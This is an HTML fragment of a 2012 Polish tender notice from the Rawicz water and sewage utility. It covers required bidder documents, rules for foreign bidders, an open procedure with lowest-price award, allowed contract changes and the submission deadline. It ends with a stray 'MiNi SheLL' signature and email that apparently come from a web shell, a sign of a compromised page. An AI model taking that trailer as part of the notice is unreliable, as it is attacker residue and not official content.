<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniona i podpisana przez Wykonawcę oferta przetargowa (załącznik nr 1 do SIWZ),
2) oryginał pełnomocnictwa do reprezentowania (o ile ofertę składa pełnomocnik) lub kopia pełnomocnictwa poświadczona przez notariusza.    
3) karta katalogowa podwozia samochodowego oraz karty katalogowe urządzeń zabudowanych na podwoziu lub opis podwozia samochodowego wraz z opisem urządzeń zabudowanych na podwoziu, potwierdzające spełnienie wszystkich wymagań Zamawiającego ujętych w SIWZ.
4) deklaracje zgodności z PN dla zastosowanych urządzeń.
5) zakres usług gwarancyjnych i serwisowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy, o których mowa w art. 144 ustawy PZP w następujących przypadkach
1) zmiany urzędowej wysokości stawki podatku VAT, 
2) zmiana terminu realizacji zamówienia, 
3) przekształcenie którejkolwiek ze stron umowy,
4) zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
5) warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna dla Zamawiającego,
6) innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl zakładka przetargi - ZWiK<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji w Rawiczu ul. Półwiejska nr 20, 63-900 Rawicz, pokój nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 11:30, miejsce: Zakład Wodociągów i Kanalizacji w Rawiczu ul. Półwiejska nr 20, 63-900 Rawicz, sekretariat pokój nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com